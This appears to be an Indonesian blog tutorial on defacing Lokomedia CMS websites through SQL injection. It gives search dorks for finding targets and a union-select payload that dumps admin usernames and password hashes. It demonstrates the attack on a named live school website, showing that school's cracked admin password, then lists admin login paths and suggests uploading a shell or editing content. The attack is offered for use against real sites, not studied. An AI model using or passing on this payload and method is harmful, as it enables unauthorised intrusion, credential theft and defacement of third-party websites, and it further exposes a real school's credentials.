Header Ads

test

Deface dengan metode SQL Lokomedia


 

Assalamualaikum W.r W.b
Bertemu lagi dengan saya
Kali ini saya aka memberikan tutotial deface dengan cara SQL injection on Lokomedia CMS

Oke, simak baik baik ya...

BAHAN
1.Dork:inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html
*nomer nya bisa di ubah agar bisa dapet yg fresh hehe

2.Exploit:
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

yaps langsung saja kita dorking memakai dork yg di atas tadi
- disini saya sudah mempunyai live target > http://www.smaitnurhidayah.sch.id/statis-1-profil.html
- yaps lalu kita masukan exploit nya di bagian setelah angka jadi seperti ini
  http://www.smaitnurhidayah.sch.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
- setelah itu kita ambil user dan password, kalian bisa menggunakan CTRL + U untuk mengambil user dan password nya contoh seperti ini
- yaps sudah terlihat user dan password nya tapi password nya masih berbentuk MD5 maka kita harus mendecrypt password tersebut menggunakan Hash Killer
- kalian bisa mendecrypt password tersebut disini Hash Killer
- mari kita decrypt password tersebut, yap dan hasilnya seperti ini
- dan ternyata password nya itu adalah : 12oktober2008
- setelah itu kalian tinggal login ke halaman admin
- untuk login cms lokomedia biasanya di
   -site.com/admin
   -site.com/adminweb
   -site.com /redaktur
   -site.com/administrator
- yaps jika sudah menemukan admin login nya kalian bisa upload shell atau edit berita entahlah sesuka kalian
- ya mungkin cukup sekian.... next saya akan memberikan tutorial mengupload shell di cms lokomedia
  
ok see you on the next tutorial babay :).....



Tidak ada komentar